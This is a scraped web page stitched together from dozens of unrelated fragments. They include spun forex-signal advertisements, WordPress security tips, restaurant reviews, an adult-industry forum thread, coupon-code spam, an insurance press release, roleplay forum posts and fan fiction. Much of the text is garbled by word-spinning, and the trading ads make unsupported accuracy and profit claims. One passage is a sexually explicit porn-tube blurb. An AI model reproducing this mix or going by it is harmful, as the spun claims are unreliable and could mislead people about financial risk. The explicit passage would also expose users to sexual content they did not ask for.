DRAFT Wildlife Program Amendments Joint Technical Committees and Members Advisory Group Amendment Strategy Workshop July 23, 2007.
Analysis of November 2006 Status of the Resource Summary Report Presentation to Northwest Power and Conservation Council September 11, 2007.
You are about to download a driver version for Foxconn Renaissance II Broadcom LAN. This download links are providet to you by driver developers
To make the most of these Tremendous financial savings, be sure you Look at this page routinely - you might find just what You are looking for at 50 percent the value!
Pass is our new subscription method designed to carry you limitless two-working day free delivery for one particular 12 months with no minimal get. Get what you need ― fast!
Lauren G. Verified critique Brent did some Focus on our residence: hung heavy items on our outdated home's plaster partitions, refinished out wrought iron railing, painted, made customized furniture and various pieces, and fixed our fence!
“There have been changes and there will be more changes,” Department of Education (DepEd) Secretary Leonor Magtolis Briones reaffirmed on Wednesday as the country draws closer to welcoming the first batch of graduates of the K to 12 Basic Education Program in April. With the increasing demands of the ever shifting world, the Education chief emphasized that catching up with change can no longer be done on a “one at a time” basis. Thus, despite calls to abolish the K to 12 program, with the support of President Rodrigo Duterte…
DepEd AnnouncementsChanges in PH education, department of education, DepEd, K to 12 Basic Education Program, k to 12 program, Secretary Leonor Magtolis Briones, senior high schoolLeave a comment
"Nueva Corónica y Buen Gobierno" by Felipe Guarnan Poma de Ayala is not only a chronicle dedicated to the description of the grandeur of the Andean pre-Columbian societies and denouncing the abuses of the Spanish invaders. The "Nueva Corónica" also proposes a new socio-political model for Peru which is the subject of the article. Such proposals have a distinctly Andean background, as the proposed changes relate to Andean ideals. There is however an important European element: it is proposed that in the future Peru should follow the Christian religion. According to Marta Mróz, the proposal was primary another manifestation of Guarnan Poma's rejection of the Spanish conquest.
The paper describes the social and economic situation of the artisans in the Inca Empire (Tahuantisuyu). The study uses both historic linguistic and modern sources. Most of the artisan production took place within 3 different social groups: the conquered people, the peasants and the artisans from the coast. All artisans had to pay a tribute to the Inca authorities. Zasada's article also describes the different types of artisan and craft production.
The article describes how the concepts of nation, nationalism and Peruvian identity functioned in the 1920's after a 100 years of Peruvian independence. In this period newly emerged political groups and members of the intelligence started to discuss their varying concepts of national identity. Many intellectuals had conflicting ideas and engaged in a number of debates. However, it appears that the image of these ideas was not fully understood by the masses. An important factor was the fact that the majority of the population at the time did have its own indigenous culture and identity.
The article is a printed version of a speech that was presented at the 6th meeting of European Latin American Historians (Stockholm 1981). The article is mostly a presentation of macroeconomic data about the Foreign Investment and Foreign owned companies in Chile 1930-1933. The majority of foreign capital based companies were active in the sulfur and oil industries, as well as banking and retail. In the period from June to September the Socialist Republic of Chile existed. The article discusses the issue of the economic policies of the government of Chile and the governments of European countries policies that influenced foreign owned businesses in Chile.
Diplomatic asylum is a kind of asylum that is granted on the ground belonging to a diplomatic mission. The Latin American countries have a number of legal regulations regarding this kind of asylum. According to Sosnowski not many other countries do have the institution of diplomatic asylum codified. The legal basis for such asylum was set by conventions in Havana (1928), Montevideo (1939) and Caracas (1954). The existence of such regulations can be related to the legal recognition of "urgent" cases of persecution. The above mentioned legal acts also describe who can qualify for such asylum.
Right before selecting to trade international exchange it is best to very carefully take into account your investment decision goals, volume of working experience and danger urge for food.
All guidance and/or solutions presented here are intended for managing automatic software program in simulation method only. Investing futures just isn't for everyone and does carry a superior level of danger. AlgorithmicTrading.net, nor any of its concepts, just isn't registered being an investment decision advisor. All suggestions provided is impersonal and not tailor-made to any specific person.
They also handle your money by providing you with signals with correct possibility and dollars management. You could get customized service of their HNI bundle for much better guidance as per your investment and risk appetite. Check out Site ww.fxhubs.com Total score 5/5
A prosperity of coaching resources – These could possibly be made available on the net or by phone, and therefore are a superb way to be improved educated while in the intricacies of the Forex market place
Sometimes not all thoughts will get a direct answer all through a Stay stream. Even so, we have traders on line 24/7 while in the Are living chat to ensure you receive the answers for your thoughts.
There’s no doubt that good Forex investing signals can drastically increase your revenue, while inadequate forex signal providers Forex signals may cause you to get rid of your cash. But How could you tell which Forex signals are worthless, and which might be worth their body weight in gold?
i have already been furnishing free of charge signals by means of whatsapp broadcast to needy associates . if interested drop me a concept with facts
A two-thirty day period on the web application that teaches one of the most thriving financial commitment procedures ever designed.
Trading our possess portfolios For some time we resolved it really is time and energy to share our effective forex signals with other traders. That is why we produced Maxpipfx, an forex signal provider with great effectiveness. We help traders to be successful on forex
- our investing desk create the large amount measurement based on a few features for instance: acc equilibrium/fairness, first 7 days tactic etc.
Thomson Reuters Elektron A data and buying and selling suite to electricity the company and connect world markets
For increased accuracy, I believe they always search for the fundamental part instead concentration only on technological to acquire increased accuracy. I may check with them a check out from the very long-phrase general performance of any pairs which can be ninety% correct and built me a very good return on very long-term trades likewise. I want to give a hundred% ranking to Invest Tipster for earlier mentioned-supporting details.
We're at present providing two Futures Buying and selling Methods which trade the ES & TY futures. Go on looking through to find out for yourself how utilizing a professionally made algo investing program could be valuable to your expense aims.
We propose ordering a plastic card. It will permit withdrawing money from ATMs in much more than 200 international locations within the globe. Aside from, we suggest payments by financial institution transfer on your settlement account.
I've had two WordPress blogs hacked into formerly. That was at a time when I was doing almost no internet marketing, and until I found time to deal with the situation (weeks later), these sites were penalized at the main search engines. They weren't eliminated, however the ratings were reduced.
I back my blogs using a free plugin WP DB Backup up. I will always restore my website if anything happens. I use my blog to be scanned by WP Security Scan free plugin and WordPress Firewall to block asks to fix malware problems free.
You can search for software that will backup your database and files. If hackers suddenly hack your website, you can easily restore your website with the use of your backup files and change.
You must create a new user, before you can delete the default admin account. To do this go to your WordPress Dashboard and click on User -> Create New User. Enter all the information you need to enter.
Along with moved here adding a secret key to your wp-config.php document, also think about altering your user password into something that is strong and unique. WordPress will tell you the strength of your password, but a great idea is to avoid phrases, use letters, and include amounts. It's also a good idea to change your password regularly - say once.
There are always going to be risks being online (or even just being alive!) Also it's easy to get caught up in the fear. We often put the breaks on, As soon as we get caught up in the fear. This isn't a fantastic reaction. Simply take some common sense precautions forge ahead. It is going to need to be dealt with then, if something does happen and of quaking in click reference your boots 23, no amount will have helped. If nothing does, all is good and you haven't made yourself sick.
I always keep a bag of frozen organic blueberries on hand. Costco sells a 3 pound bag of these gems in the freezer section. I rarely buy fresh blueberries because they mold so quickly (like between leaving the grocery store and arriving on my kitchen counter!).
Blue Butcher proclaims to be a meat power house. They are cooking all types of meat other than concentrating on singling out Dried Aged Beef as a selling point. I personally believe Beef meat is too marketable as a concept and it is one of the fewer meats on the market that can be cooked more towards rare, which gives it instant advantage against other white meats like Pork and Chicken which are usually cooked closer to well-done and therefore less juicy. Over at Blue Butcher, one gets to appreciate that they try to balance everything right as an all rounder.
This is actually my 1st visit to Blue Butcher, upon invitation by my marketing friend and herself a big foodie. I don’t really go to new shops that often if you really know me
The 2nd one is a Pork Chop and Apple Sauce. In general I found the cocktail recipes to sound intriguing enough but when you sip it in, could do with more of the advertised flavours? For example in the 2nd, more bacon and apple. ~ 7/10
Named as Blue Butcher, for some reason I expected some out-of-this-world spread. Such as a Bone marrow butter, whipped Duck fat or a Lardo spread with fried chicken skin powder, etc. I have had a lot of these alternatives if you have been following this blog and they do make an impact on your life. They increase your waistline ! xD
Was a bit surprised by the shape tonight, which isn’t very terrine mould-like in shape. Whilst the flavour was intense and you can taste the seasonings and fruit inside, I think it was too grinded up compared to the usual pigs head terrine which are either more shreddy or chunkier. This became a little too dense to my liking. ~ 6/10
The burrata was very creamy in taste, which to me is important as a lot of burratas in town are very weak. I find that a lot of customers somehow expect Burratas to be all runny but in reality they don’t always. Unless they’re leaking out whey water. Liked the basil oil idea but wanted more real basil leaves on top! ~ 7/10
The two types of livers made a strong impact in taste, but it was slightly denser than I had imagined. The taste on the other hand was addictive. In my head, I instantly compare it to the versions served at say Carlton Wine Room (Melbourne) and Cumulus Inc (Melbourne). I think this could do with slightly more aromatic wine and also slightly more lighter? ~ 7/10
Comparing marrows to marrows, the Blue Butcher one on this occasion was the best I have eaten locally. It’s not overly fatty and is roasted until transparent inside. It’s also seasoned well and slightly smoky, with a good maillard reaction created roasted fat flavour. Eat it with the parsley which worked well altogether. ~ 9/10
This feeds 3-4 people. Slow cooked for 24 hours with rosemary oil, this baby lamb is distinctive for their dark rims around the eyes. The meat is silky smooth and there isn’t an overly pungent lamb gaminess, which puts off certain people. Limited to 3 serves per day as the lamb is so rare it hardly gets exported outside of France and this won the best lamb award in France last year. The roasted potatoes I might added were really crispy which is rare in HK. The baby carrots to me seemed slightly undercooked though. ~ 8/10
Pink in the centre, fork tender. The smoked mustard and Pommery mustard on the side were deemed redundant.
This tasted quite Americanized to me for some reason, may be the cream. But very lovely side dish. ~ 7.5/10
A no brainer. This was fried well and had a good truffle paste taste. It’s not hand cut in-house but if you have done triple-fried chips you would know it’s not commercially viable in most cases, especially if you need to serve a thousand customers a day ! ~ 7.5/10
Nice buttery crumble, with well stewed apples. This was one of the best ones in town I have tried although I still prefer my apples to be more spiced. The ice cream on the other hand wasn’t very Port or Walnut like. ~ 7/10
I encountered such a version in Germany a few times recently and sorta miss it. Glad to find it again in Hong Kong, at Blue Butcher! I like Blue Butcher for a number of things but I could still see scope of it elevating to another culinary level. For example, the meats were cooked spot-on and there were 2 secrets behind how they managed to achieve this (I am afraid I will have to carry them to my grave!). On the other hand, somehow with their name-sake I was expecting something very hardcore. Right now I am loving the new French lamb shoulder a lot and those delectable potatoes!
Macau has a historical Portuguese upbringing, and its influences affected everyone being brought up here. The same can be said about Hong Kong, when the Colonial British state also helped us to establish our own slightly British affected Culture indeed. This revisit to A Petisqueira with a Michelin Guide Mention was a little different from before indeed, the food was less oily and salty than before. Surprisingly the portion of food also increased! Definitely recommend them to be shared amongst a few foodie friends if they have a huge appetite!
With Chourico sausage. The last time I remember having a great one was at Sheraton Poolside BBQ. To me this slightly Catholic recipe throughout the World, just needs some sophistication Layering... Here it was only normal tonight compared to the best in town ~ 6/10
These were decent rather than great, its made well but somehow missing the Umami from the salted cod for me. ~ 6.9/10
Casa Lisboa in Hong Kong so far makes the best version. This one here, was a little too dry without enough pork fat fragrance. Big portion though! ~ 6.9/10
Recently Alibi Wine Dine be Social inside Mongkok Cordis Hotel, part of the Langham Hotel Group, welcomed new Chef de Cuisine James Oakley to create brand new dishes for the restaurant. James has worked previously in some other notable restaurants in Hong Kong and also the UK such as Restaurant Gordon Ramsay at Claridge Hotel, and Aqua Group Hong Kong, and this time we were invited over to try out some New Dishes as the 1st batch of diners. Personally I thought their Dinner Set Menu at HKD $428 for 4 Courses was super attractive, plus Desserts are priced at only $98 each, making here an ideal place for a drink and dessert any time as well.
It's location in Mongkok, which is in the middle of Kowloon, is very convenient as a meeting point, and to me Cordis Hotel's Alibi is comfortable for chillaxing. Now with the new Menu, there is added incentive to come for Dinner altogether.
On top of the Menu items, we can give our own preferences to the Cocktail Bartender and she will instant shake up a new recipe to suit our personal tastes.. I asked for a Whisky based Summery drink just to see her resulting drink creativity!
Pickled Mushrooms, Goat's Cheese Mousse, Pine nut Purée, Edible Parsley Moss served with Brioche Toasts. This was served with Dry Ice and followed up the coolness with great taste, especially loving the morel and black trumpet mushrooms in this rendition. A Signature appetizer here..
A refreshing dish that had some elements of Asia in it, but without the typical South East Asian exotic chili and sour sauces. I liked the cleanness of this..
This came with the smaller quail eggs wrapped in pork, more bite size morsels. On a birds nest made of Fried Leeks...
This was gratinated on top and was quite cheesy. I love melty cheese food so this would be a crowd pleaser indeed, and we ate this more like pasta sheets
This was interesting because the crispy quinoa reminded me of sand in the ocean, topped with two seafood. This margination was spot on for me because it's not overly sweet or overboard, it doesn't look like it but it will give Nobu Matsuhisa a run for his money. The Ice Plants here are not the usual lettuce leaf like types, but a rarer European Carpobrotus Edulis specie..
Both the Lamb types, from a Iberico to a mountainous Pyrenees cuts were quite gamey surprisingly for a hotel restaurant. Even it took me some seconds to get used to it! This was really lovely, and with the lamb jus it worked really well with the mille-feuille potatoes with burnt edges.
US Sirloin with Soy Glazed Beef made from Leg & Shin, Fried Garlic, Thrice Cooked Potatoes The beef presented Two Ways was lovely and Chef Oakley smartly used some secondary cuts to make the centre of this dish, which slow braises the cuts until tender. In Hong Kong people are used to ordering Prime cuts instead of Butchers cuts, but here you get both so it suits everyone. Loved the crispy potato but wished there was more, and I saw that others eating this dish after me got some fried Beef Tendons too! Something I experienced more in the UK dining scene..
Served with a Spicy aioli sauce. This was quite smokey and really medium rare tender inside. One of the best pigeons I have had recently. Will be back just for this dish, and the dip we had to order some extra fries to eat with them!
A pretty dessert that was part of the $428 for 4 Courses Meal, by itself this is just $98. Desserts work on rotation daily, so there's always some elements of surprise.
Quite a British banana dessert for me for some reason. This Signature dessert is definitely for you if you like Caramel and Banana, with Cheesecake! Balanced by some dehydrated Raspberries for sourness. Overall I was surprised at how affordable a 4 Course Dinner here is at only HKD $428, and it is definitely on the top of my list of to do's if I am in the area near Cordis Hotel.
ARCHIVE Select Month November 2018 October 2018 September 2018 June 2018 May 2018 April 2018 March 2018 February 2018 December 2017 October 2017 September 2017 August 2017 July 2017 June 2017 May 2017 April 2017 March 2017 February 2017 January 2017 December 2016 November 2016 September 2016 August 2016 July 2016 June 2016 May 2016 April 2016 March 2016 February 2016 January 2016 December 2015 November 2015 October 2015 September 2015 August 2015 June 2015 May 2015 March 2015 February 2015 December 2014 October 2014 September 2014 August 2014 July 2014 June 2014 May 2014 April 2014 March 2014 February 2014 January 2014 December 2013 May 2013 April 2013 March 2013 February 2013 January 2013
Is the piracy thing really something new? it has always been part of this industry, if hosting was this cheap in the 90s it would be the same bullshit we are seeing now. The thing is, everyone wants traffic and people will do anything they can to get it as long as a profit is made.
The easiest way to generate traffic is to give away more and more explicit content. Tubes are just the natural progression. But as you give more away for free, the harder it becomes to sell. It's been a self maintaining cycle of destruction that still continues.
Content is more and more de-valued as time goes on, it's becoming a tool to generate traffic vs something you sell.
The interesting point in this will come when there just isn't the content out there to make that work. The last I heard the DVD market was in meltdown. You have content companies like Matrix out of business. What content will be left to steal? And the margins a lot of these sites are operating at don't really justify them shooting their own stuff. Traffic is worth less per visitor than ever before. Maybe we need to hit absolute rock bottom before the industry gets a reset.
Pimproll. It's an out and out disgrace when a sponsor has a site with a DMCA takedown notice on its page.
I don't think that ever happens, if you are a large company with tube sites and are runing thin on fresh content what do you care if you release some of your own full length movies, but really is this industry running low on content right now? not yet not even close and I don't think it ever will. The thing is for these guys ratios mean shit it's all about number of transactions, 1000 signups at a ratio of 1:2000 is the same as 1000 signups at a ratio of 1:500 give or take a few bucks in b/w, for regulars this doesn't work because we are unable to obtain the volume of traffic needed to justify running our business this way. People will argue the ratios will just get worse and worse, probably but you have to remember it's porn, impulse purchases will be made, even with the shit ratios we see these days subscription sales are still a large part of the income. You add alternative products like live cams, dating, pills etc. and you are fine provided you have traffic...lots and lots of traffic.
It's always been about pure volume for them. But I do believe for even that model to continue there has to be a rebalancing between traffic and content.
Whatever they'll do, it won't solve the problem. Most likely, they will kill the messenger. How about a new set of 2257?
Govs and laws do very little, they have way bigger issues to deal with then copyright infringement especially these days. 2257 is there to protect minors, doesn't make sense to use gov resources going after anyone other then serious cp offenders, and this law only effects US, of course most countries have very similar laws in place anyway.
There's some pretty extreme stuff out there on tubes. It will only take one big headline for the free availablility of that to become a vote winning issue for politicians. You can already hear that on the margins.
Because the society that evolved in the last 150 years is fucking unsustainable and unworkable...I mean, who's bright idea was it to have nuclear power everywhere depending on the whims of nature and staff like Homer Simpson?
When I first started out a cute 18 year old in a bra and panty would convert......now, content typically has to be "harder".......
Here are my Super 6 Predictions, which should perhaps serve as a guide of what scores not to predict as this year they have not been terribly fruitful (outside of one week when I nailed 3 in one go)
Makemytrip Flights: Offers & Coupons. Makemytrip often comes up with Makemytrip discount coupons, Makemytrip flight Rightstay is a Make my Trip venture that
Via.com lets you book cheap flight tickets in just 3 easy steps. Get lowest fares on domestic and international flights in the shortest time. My Coupons. My
Now earn more with your Makemytrip Referral id coupon. MakeMyTrip Referral Id Coupon and Discount MakeMyTrip Flight Offers. Make My Trip make your
/ Make My Trip. 660 recommended. Get up to INR 10,000 instant discount on International Flight bookings! then never forget to check the bus coupons on DesiDime.
Discount up to 20% on Select 34 And 5 Star International Hotels at MakeMyTrip. 21 MakeMyTrip promo codes and coupons for June 2018. Offers end soon!
Book your flight tickets and get up to Rs.2000 off. Use EaseMyTrip Coupons and Promo Codes to Find EaseMyTrip coupons and discount coupons for EaseMyTrip at
bookings as long as they have some MakeMyTrip coupons. on over to Make My Trip. your a great Rs 6,000 discount on your return flight to Canada valid
Get MakeMyTrip Domestic Hotel Coupons, 3,000 discount on all International flight on your bookings and make your trip more economic. Makemytrip
Choose from dozens of domestic flight coupons and cheap air and INR 1000 on round trip bookings. To get the discount International Jet Airways
The Biggest and Best Collection of discount coupons for free. Save on flight, MakeMyTrip Coupon Codes Make my Trip rail ticket provide best services
Make My Trip is amongst the fastest growing travel companies of Up to $3000 off International Flight plus Hotel Bookings on All Make My Trip Coupons
Deal4flight - The Simplest & Fastest way to get all Domestic and International Flight Deals, Flight Offers, Flight Coupons, Flight Discounts at one place.
Coupons for Domestic & International Flight bookings & Hotel Booking..HDFC Bank offer- 1500 instant Discount on Domestic Flight..40 flight using make my trip
MakeMyTrip cashback offers and coupons are available on flight and hotel booking international and domestic flight done through Make My Trip
Get free ZoroTools coupon codes, deals, promo codes & free shipping for June 2018. Saving money starts at DontPayfull.com.
Frustrated by coupon codes that don't work? We are too! Get verified Zoro coupons that work at CouponCodes.com
Grab your savings at Zoro Get 40% OFF Latest Promo Codes Today only Coupon Codes June 2018. Save more money with DiscountReactor
June 2018 Zoro Tools Zoro Tools Coupons. Don't hesitate to visit ZoroTools.com these days and feel free to use the coupon code to benefit from a whopping 20%
Save up to 35% Off with these current zoro coupon code, free zoro.com promo code and other discount voucher. There are 272 zoro.com coupons available in June 2018.
Save up to 20% with these current Zoro coupons for June 2018. The latest zorotools.com coupon codes at CouponFollow.
Use Zoro coupon codes for June 2018 and save up to 50%. For all Zoro promo codes, online coupons and free shipping deals, think CouponPark.com
Zoro Tools Promo Codes for June, 2018. Save with 3 active Zoro Tools promo codes, coupons, and free shipping deals. 🔥 Today's Top Deal: 20% Off Your Order at Zoro Tools.
Click to save big with 96 latest 2018 Zoro.com coupons & promo codes. Check out the best zoro.com coupon of January 2018 now.
Most used today : 15% Off Sitewide Save more with Zoro Tools promo codes, coupons and online deals from CouponsMonk. Get only working coupons and deals daily.
Zoro Coupon & Promo Codes Current hot promotion: Save 15% on Any Order is available from Zoro. Simply click "Get Code" and go to shop at Expires: Aug 23, 2018.
Special offers: get Zoro discount coupons and save 30% OFF in June 2018 on tools, equipment & more. Discover promo code and promotional code to save cash.
Redeem Zoro promo code to save $5 OFF $25 purchase on tools & FREE shipping for June 2018. Find all Zoro coupons & coupon codes here.
Horny Big Tits Anal Sex is the only way out when you require rapid rehabilitation and relaxation. This amazing Free Big Tits Porn Tube always has more vicious Big Tits Sex Videos than you can watch within weeks. Give yourself a generous share of pure lust and acute adult enjoyment. 3:01Poop Chute Hammered Bitches In Sexy Lingerie; 5:29Lovely housewife is partying with her friends; 6:47Tight ass needs a good fuck; 6:47Busty Milf takes care of her rack before pounding; 7:01Two guys are fucking a busty secretary;.
NEW YORK, October 7, 2016 — The insurance industry has the financial strength to pay claims caused by Hurricane Matthew, according to the Insurance Information Institute (I.I.I.)
Wind damage to cars, homes and business is covered under auto, home and business insurance policies. Flooding, however, is not covered under most standard property insurance policies. Separate flood coverage is available from FEMA’s National Flood Insurance Program (NFIP) and a few private insurance companies.
The U.S. P/C insurance industry’s cumulative policyholders’ surplus—the amount of money remaining after the industry’s liabilities are subtracted from its assets—stood at $680.6 billion, a record high, as of June 30, 2016, according to a report issued this week by ISO and Property Casualty Insurers (PCI) Association of America. This is despite insurers having already paid out $14.5 billion in natural disaster caused claims in the first half of 2016. Dr. Steven Weisbart, the I.I.I.’s senior vice president and chief economist, offered a commentary on the report.
Natural catastrophes that impacted U.S. P/C insurers in the first-half of 2016 included wildfires in California and hail storms in Texas. Hurricane Matthew has the potential to be the most consequential insurance event of the year in the United States.
For reporters writing about the impact of Hurricane Matthew, following are some of the I.I.I.’s resources:
The I.I.I. has a full library of educational videos on its You Tube Channel. Information about I.I.I. mobile apps can be found here.
Looking for information about preparing for or recovering from a natural disaster like Hurricane Matthew? Here are some useful links:
Mira watched Koran sleep for a bit before moving to kiss his cheek. She got up and padded off into the washroom to get cleaned up after their romps in the sheets last night. She didn't want to be so overpowering scented with their activities when she went to the infirmary to get her Zion treatment. Her tummy rumbled a bit, too, but she usually met with Koran after her appointment for breakfast, so she would ignore it for now.
Sarah looked at the vial and narrowed her eyes a bit. She took it and the instructions from Opal, reading them and then shaking her head. "This... can't be possible," she said, holding up the vial. But it was possible. more than that, it was real. "Miravanna..." she said.
Nikki looked up at him when he said it could wait a bit, changing his bandages. She looked down at his hand rubbing her wrist. “Mine‘s not as bad as yours…” she said quietly, but then smiled warmly... more
Pherenice perked up as she looked at the waffle. "This is simple? It smells so good….what kinds of syrup?" She asked curious as her ears twitched and her tail swished seeming much like a little kid.... more
Acerbus smiled, "She is just waking up now, a bit more subtle than her brother." He noted moving back to the crib and looking down with a smile, Liora slowly waking up little by little. Finally... more
Cracking open an eye as he felt the bed shift after a kiss on the cheek Koran took a moment to watch his kitten go for the washroom. "Ah yes..she has her treatment today guess I'll take the... more
Staying quiet to watch the proceedings both Samson and Judith looked on to Delilah with pride. There were some who thought transferring the power was a mistake, that Acerbus and Del were not ready. Or that it maybe should have been to someone who had stayed with the Unkindness and not run off. But, that is what their tribe needed, eyes from the outside or they would have repeated past mistakes. Walking over to Donovan, "Please also keep us in the loop." Samson asked but he knew who was in charge.
Donovan nodded best to take the advice of everyone and just let his wing mend for the moment. He had those he worked with to help delegate these tasks. Of course his poor assistant is getting stone walled but, that happens as well.
Lukken looked up as he was picked up by Twilight who was looking of something to do any way. The conversations the adults were having was little over his head. Blinking a few times and smiling. "Twllal." He said trying to sound like he was saying her name.
Acerbus smiled a little watching. "He is trying." He noted about the talking aspect of his son. But, he knew with the connection. "He says Hi Aunt Twilight."
Rachel pulling away for a moment to step in front of Koi. "And that is why I think he picked you." She noted, "When we had those other members dismissed do you know what some of them said? They cared about their reputation or their status in the Unkindness. Not one seemed to care about the people they were suppose to represent." She moved putting her notebook down. "We need new younger blood that still have hearts to listen to."
Rio shook his head, "We started to see differently about certain jobs. I have a few rules, don't steal from those who can't afford it, always have an escape route, and make sure you can carry it all in one trip." He explained just a few of this rules. "Learned a lot of that from The Minnow, now she was good." He said not knowing that who is now Lady of this tribe. "Gizmo was pushing riskier jobs and bigger takes and well last one we worked went south quick, in the end lost the loot and almost saw our lives in chains. Safe to say we had a big fight and partnership dissolved after that."
Duncan looking over, "Yeah it is." he said though not looking at the nature around him, just his mate through all of this. He walked behind her a bit and moves his arms to hug her from behind leaning down kissing the side of her neck.
Serg smiled and nodding, "Yeah we been...um busy with it." he said not trying to sound like that is all they have been doing. But...that is all they have been doing. He then looked up and over. "No kidding?" He responded. "We need to be careful here people are going to think we four are having some kind of competition." He joked.
Torin making to the top and looking about, "Well, that isn't such a bad thing is it?" He asked her, he could feel the frustration in his wife's voice when they made it up here.
Panro smirking a little, "There isn't a lot I don't like about you Sandy." He told her as she kneaded him more and more almost relaxing him after their passion over took them this morning. "Hmmmm..." He sighed a little into her his eye catching what looked like a letter under their door but at the moment not caring.
Lana nodded in agreement. "Also this shadow world sounds a lot like Darkness Plain my mom would tell me stories about at home." She added moving to get some sandals on. "I wonder if they are one and the same."
Fang agreed which is why he was also thankful that Garand wanted to lean some things from the elder dragon. Gave him something to do as well. His head perked up a little, "Is she?" He said with a sound of happiness in his voice. "Good, haven't spoken to her lately, be nice to catch up on if traveling away has helped her in any way."
Delilah looked across at Donovan and nodded a bit. "Of course, but... I'd much rather you rest some this morning. Perhaps we can get you some Zion to aide in the healing," she said, knowing Fai had... more
Koran's lip twitched into a bright smile at this reused conversation bit, seeing as this isn't the first time they've done this song and dance "Well your my cute princess and thats what really... more
Delilah smiled back at Samson and Judith before she excused herself, showing herself out. She pulled the door closed quietly behind her and made her way from Donovan and Fai’s perch back across the... more
Acerbus took a note that there wasn't much else to his son would say. He looked over, "Twilight..." He started lightly moving next to you. "I think he can help, Eros seemed to think he can do... more
Twilight just hugged her nephew on her lap and looked at Acerbus. She took a breath and went to speak, "For a long time you were the only--" Her breath caught in a sharp inhale as she seemed to hold... more
Koran did his best to valiantly ignore the occasional stares he was getting as another mystian couple passed them, he'd be quite thankful if no one asked what happened! Clearing his throat he... more
((Ugh crazy week. Catching up and Welcome back Shi ^_^)) Eri chuckled as she looked from Amara to Tria. "Mmm not sure how about we just take a look at what Amara suggests and figure out which is... more
Acerbus wanted nothing more than to move over and just hug his little sister. He knew she had taken on some much and wished she had come to see him more. But, things kept them away. He turned hearing ... more
Rachel smiled brightly, "Now that is more like the Koi I have grown to know." She said and moving to check off last few items. "And believe me I've been trying to get them to make new clothes for... more
Day wasn't backing off, despite Sax's attempts at defusing the situation. Sax rolled his eyes as well- not out of particular rebellion or anything so much as the fact they were both being idiots.... more
She crossed her arms and moved to the exact middle of the hallway. "I am not moving until you tell me exactly what happened," she said.
She assessed the situation for a moment; the last thing she wanted to do was waste time with names, introductions, and other sickening niceties, but at the same time the "direct approach" wasn't... more
"And this is Day. My partner." He was getting increasingly fed up with them, and really didn't feel like he was able to stay standing up without support much longer. "Improbabilities. I think we're... more
She refrained from any snarky comments; these two weren't pushovers like Greenie. Mia should have realized that sooner. ((It's probably apparent, but just to avoid confusion, that's her nickname for... more
Sax cut to the chase. "Yes. But maybe we can, I dunno, start heading to Medical?" He sounded more pleading than he was aiming for, but that could have also gone with the fact that he was in Day's... more
...and mentally kicked herself. No wonder they had insisted on moving through the hallway! If Mia had noticed it sooner, she would have adopted a totally different strategy. "I can splint that," she... more
Day looked at Mia with some consternation. "Go for it," Sax said. He moved slowly to lean against one of the walls, and closed his eyes. "Just don' mind me."
Then she turned and slammed her monkey wrench into the Generic Surface wall with as much force as she could muster. It broke through the grey material after a few swings; she aimed the wrench a few... more
Day looked at the ruined wall faintly. "Or at least you," she amended. She looked at the bar of Generic Surface. "That was pretty smart, though. Sure it'll work?"
She handed the grey stick to the wounded agent and then flicked out the pocket knife she had noticed in her pocket earlier. She began cutting off her left sleeve for the splint, then her right. The... more
Mia straightened out the agent's arm and laid the stick of Generic Surface on it. She tied the cut sleeves above and below the break, making sure they were tight, but not tight enough to cut off... more
Took that chance to show up and address the other bodily-changed agents. He must have been quite a sight as he stalked...or rather, waddled, he looked like he was trying to avoid tripping over his... more
He looked at the newcomer blearily. "Day's too young and I don't smoke," he said, motioning at himself and then Day, who was looking at the splinted arm with some relief. "He doesn't either," Day... more
"I'm rather attached to my lungs," she said. She realized, with an odd feeling in the pit of her stomach, that this was the longest conversation she'd carried on in months.
"Well...#*@((!". It was odd - it was obvious he was cursing, but it didn't quite...sound right. It was almost like he was using curse words so bad that they couldn't be registered. "Dat is beein'... more
"I had no idea anyone could do that," he said. "I'm Sax. That's Day," he motioned at his partner. "I was about to say, you look like the weirdest Fallout ghoul I've ever seen."
...although she'd heard of it. Shooter game, wasn't it? "You can tag along," she said. The former ghoul might be useful. Maybe. His speech patterns were already getting on her nerves, though... "So,... more
"Meesa have no idea. One minute, Meesa sleeping in RC with meesa special straight razor beneath meesa pillow, then there bein' a loud "THUMP," then meesa be wakin' up with frog feat'res." He sighed.... more
"We swapped," she said by way of explanation. The two trailed after Mia and Gurgan. While the splint certainly helped matters with Day, Sax was still feeling dizzy and everything was still out of... more
then Day and Sax's. She hadn't realized that they had swapped bodies; she had no idea who her mind was currently inhabiting, and she had assumed that they didn't either. She noticed the ex-ghoul... more
"Why, yes! Meesa know entirely who did it! Dat's why meesa totally beatin' heem to deat' with hees own shinbone 'stead of sittin' here with yousa." He shook his head. "TINK before yousa be speekin',... more
"Weeell, it may have been to do with us." "Stairs happened," Sax said, cutting Day off before she could elaborate.
Even the possibility of knowing what had happened seemed unimportant in the rush of anger-driven, slightly glittery adrenaline that flooded her body. No one insulted her intelligence like that. "Do... more
"Sure. Think before yousa speak. Anyway, yousa ego aside, and much as Meesa would be lovin' to see you t'row a tantrum, we...wait, hold on a meeniute." He looked over at the others behind him. "Yousa ... more
Day cut in, this time. "We're in Improbabilities. We got a fic with a bodyswitch device in it. There was a sequel. We brought the thingy back. And then stairs happened on the way to DoSAT." "Please... more
I can't find a wiki article on Woon. Oh, also, I noticed that Gurgan hates ex-Sues; I don't know how he might become aware of this (or if you want him to) but Mia is a reformed Sue herself. That... more
Unfortunately, Darkota - who is an awesome person, don't get me wrong - hasn't really released a lot of detail on the Gungan that Gurgan Goes with, at least that I can see. Sooo...Imma say he looks a ... more
omg, i haven't visited in YEARS! Hope everyone's doing well. I miss my old regulars (leslie, peach, flyfisherguy, dade, etc) from this site. Best Regards to moderator Sparkel. Merry Christmas!!
Andhra Pradesh RTA Road Tax Online Payment Vehicle Registration Driving Licence Search AP RTA Vehicle Tax Online Payment Andhra...
Free Directory Submission Sites List Free Directory Submission Sites List http://india-to-nri-business- directory.easy96.com/ ...
We are delighted to offer this Mercedes-Benz Actros with a euro 5 engine. Registered in 2013 the vehicle features a GigaSpace cab, an automatic gearbox, low mileage and full service history. CHOICE OF 2.
© 2018 EVS and Enza Truck & Van are trading names of Roanza Ltd. Registered in England 08865644. The Enza Building, Leacroft Road, Risley, Warrington, WA3 6NN. | Design by dmkc
As the biggest contemporary furniture retailer during the Southeast we have the widest number of sofas, sectionals, eating and bedroom sets, recliners and extras with most objects in stock and ready to deliver.
Think of how you use your outdoor Room, And exactly how you’d like it to glimpse. Do you prefer to own dinners outdoors? Do you like to read and chill out outdoors? Would you host standard barbecues or events in your lawn?
